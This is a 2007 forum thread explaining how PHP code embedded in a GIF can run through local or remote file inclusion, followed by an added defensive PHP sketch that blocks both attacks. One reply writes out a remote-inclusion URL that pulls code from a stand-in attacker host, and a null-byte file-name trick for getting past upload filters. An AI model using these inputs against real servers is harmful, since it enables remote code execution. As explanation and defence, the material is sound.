PHP/GIF Exploit
Posted by SI-Chris, 06-23-2007, 05:47 PM |
I read about a new exploit that embeds PHP code in a GIF file:
http://news.com.com/8301-10784_3-9731991-7.html
How would that work exactly? Wouldn't a server have to be set up specifically to parse PHP code in gif files? Who would set up their server that way? Is there a way around that so you can remotely trick the server into parsing gif files as PHP code?
|
Posted by b3nz, 06-23-2007, 06:08 PM |
I didn't read this article, but there are some ways to embed PHP code in a file with any extension you like!
Local File Inclusion and Remote File Inclusion are the main methods! Of course, you can upload a PHP shell with a .php.gif extension using null bytes like %00 in some portals.
Anyway, yes, it's possible and it's not an exploit.
|
Posted by SI-Chris, 06-23-2007, 06:34 PM |
According to the article (it's only a few paragraphs long), the code is executed when someone tries to view the image after it's uploaded. So I don't understand how that would work unless someone had specifically configured their server to parse .gif files as PHP, and again, who would do that? Is there something I'm missing?
|
Posted by b3nz, 06-23-2007, 06:51 PM |
Imagine that there's a vulnerable portal installed on a server which allows you to execute local files with a URL like http://victim/script.php?variable=[file-address], so you upload a file such as cmd.gif as your avatar or ... in that script and then you use the URL to execute it.
Another way, called RFI (remote file inclusion), allows you to include a file with any extension, like cmd.gif, from a foreign host. Look at this code:
Now the attacker can use http://victim/script.php?var=http://attacker/cmd.gif and execute his code on the server.
And there's another vulnerability in some scripts which upload files to the server: the attacker wants to upload his evil.php to the server, but the script doesn't allow .php files to be uploaded, so the attacker renames his file to evil.php%00 (%00 is a null byte) and tricks the script.
|
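A defensive sketch for the two weaknesses described in the post above (a request parameter passed to an include, and an upload check fooled by a null byte), added here as an example and not part of the original thread. The function names, the page map and the sample inputs are hypothetical.

```php
<?php
// Added example; PAGES, resolve_page() and safe_upload_name() are hypothetical names.
// Setting allow_url_include=0 in php.ini additionally blocks include() of http:// URLs.

// 1. File inclusion: the request parameter only selects a key in a fixed map.
//    It is never used as a path, so "http://attacker/cmd.gif" or
//    "../avatars/cmd.gif" cannot reach include().
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'profile' => __DIR__ . '/pages/profile.php',
];

function resolve_page(string $requested): ?string
{
    return PAGES[$requested] ?? null;   // unknown key: caller answers 404
}

// 2. Upload: reject null bytes, judge only the final extension, confirm the
//    header matches that image type, and store under a server-generated name.
//    A file that passes can still carry PHP text after a valid GIF header,
//    which is why check 1 must keep uploads away from include().
function safe_upload_name(string $clientName, string $tmpPath): ?string
{
    if (strpos($clientName, "\0") !== false) {
        return null;                    // names such as "evil.php\0"
    }
    $allowed = [
        'gif' => IMAGETYPE_GIF,
        'png' => IMAGETYPE_PNG,
        'jpg' => IMAGETYPE_JPEG,
    ];
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;                    // .php, .phtml, no extension, ...
    }
    $info = @getimagesize($tmpPath);
    if ($info === false || $info[2] !== $allowed[$ext]) {
        return null;                    // content is not the claimed image type
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs.
var_dump(resolve_page('http://attacker/cmd.gif'));
var_dump(resolve_page('home'));
var_dump(safe_upload_name("evil.php\0", '/tmp/unused'));
var_dump(safe_upload_name('evil.php', '/tmp/unused'));
```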